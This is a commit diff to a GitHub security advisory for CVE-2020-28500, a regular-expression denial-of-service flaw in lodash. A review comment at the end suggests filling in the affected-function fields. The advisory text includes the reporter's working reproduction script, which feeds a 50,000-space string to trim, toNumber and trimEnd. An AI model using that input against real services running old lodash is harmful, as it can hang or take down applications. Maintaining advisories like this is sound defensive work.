
jkmartindale committed Oct 20, 2023
1 parent 33dd6b4 commit b6fe667
Showing 1 changed file with 2 additions and 22 deletions.
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-29mw-wpgm-hmr9",
"modified": "2023-09-05T22:58:25Z",
"modified": "2023-10-18T22:34:24Z",
"published": "2022-01-06T20:30:46Z",
"aliases": [
"CVE-2020-28500"
],
"summary": "Regular Expression Denial of Service (ReDoS) in lodash",
"details": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. \n\nSteps to reproduce (provided by reporter Liyuan Chen):\n```js\nvar lo = require('lodash');\n\nfunction build_blank(n) {\n var ret = \"1\"\n for (var i = 0; i < n; i++) {\n ret += \" \"\n }\n return ret + \"1\";\n}\nvar s = build_blank(50000) var time0 = Date.now();\nlo.trim(s) var time_cost0 = Date.now() - time0;\nconsole.log(\"time_cost0: \" + time_cost0) var time1 = Date.now();\nlo.toNumber(s) var time_cost1 = Date.now() - time1;\nconsole.log(\"time_cost1: \" + time_cost1) var time2 = Date.now();\nlo.trimEnd(s) var time_cost2 = Date.now() - time2;\nconsole.log(\"time_cost2: \" + time_cost2)\n```",
"details": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. \n\nSteps to reproduce (provided by reporter Liyuan Chen):\n```js\nvar lo = require('lodash');\n\nfunction build_blank(n) {\n var ret = \"1\"\n for (var i = 0; i < n; i++) {\n ret += \" \"\n }\n return ret + \"1\";\n}\n\nvar s = build_blank(50000);\nvar time0 = Date.now();\nlo.trim(s);\nvar time_cost0 = Date.now() - time0;\nconsole.log(\"time_cost0: \" + time_cost0);\n\nvar time1 = Date.now();\nlo.toNumber(s);\nvar time_cost1 = Date.now() - time1;\nconsole.log(\"time_cost1: \" + time_cost1);\n\nvar time2 = Date.now();\nlo.trimEnd(s);\nvar time_cost2 = Date.now() - time2;\nconsole.log(\"time_cost2: \" + time_cost2);\n```",
"severity": [
{
"type": "CVSS_V3",
Expand All @@ -20,11 +20,6 @@
"ecosystem": "npm",
"name": "lodash"
},
"ecosystem_specific": {
"affected_functions": [
""
]
},
"ranges": [
{
"type": "ECOSYSTEM",
Expand All @@ -44,11 +39,6 @@
"ecosystem": "npm",
"name": "lodash-es"
},
"ecosystem_specific": {
"affected_functions": [
""
]
},
"ranges": [
{
"type": "ECOSYSTEM",
Expand All @@ -68,11 +58,6 @@
"ecosystem": "npm",
"name": "lodash.trimend"
},
"ecosystem_specific": {
"affected_functions": [
""
]
},
"ranges": [
{
"type": "ECOSYSTEM",
Expand All @@ -92,11 +77,6 @@
"ecosystem": "npm",
"name": "lodash.trim"
},
"ecosystem_specific": {
"affected_functions": [
""
]
},
"ranges": [
{
"type": "ECOSYSTEM",
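Review bot: The four deletion hunks beginning at `@@ -20,11 +20,6 @@` drop the empty `ecosystem_specific.affected_functions` arrays outright, although the advisory's own `details` text already names the vulnerable entry points (`toNumber`, `trim`, `trimEnd`), so the field could have been populated instead of removed; tooling that narrows reachability by affected function presumably loses that signal once the key is absent. If it is repopulated later, the value should be set per package object: `lodash` and `lodash-es` would list all three, while the single-function packages would presumably carry only their own export, e.g. `"affected_functions": ["trimEnd"]` under `lodash.trimend` and `["trim"]` under `lodash.trim` — confirm against what each package actually exports. Removing the placeholder `""` entries is still an improvement over leaving them, so this is a follow-up rather than a blocker. Each affected-package object continues beyond its hunk.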

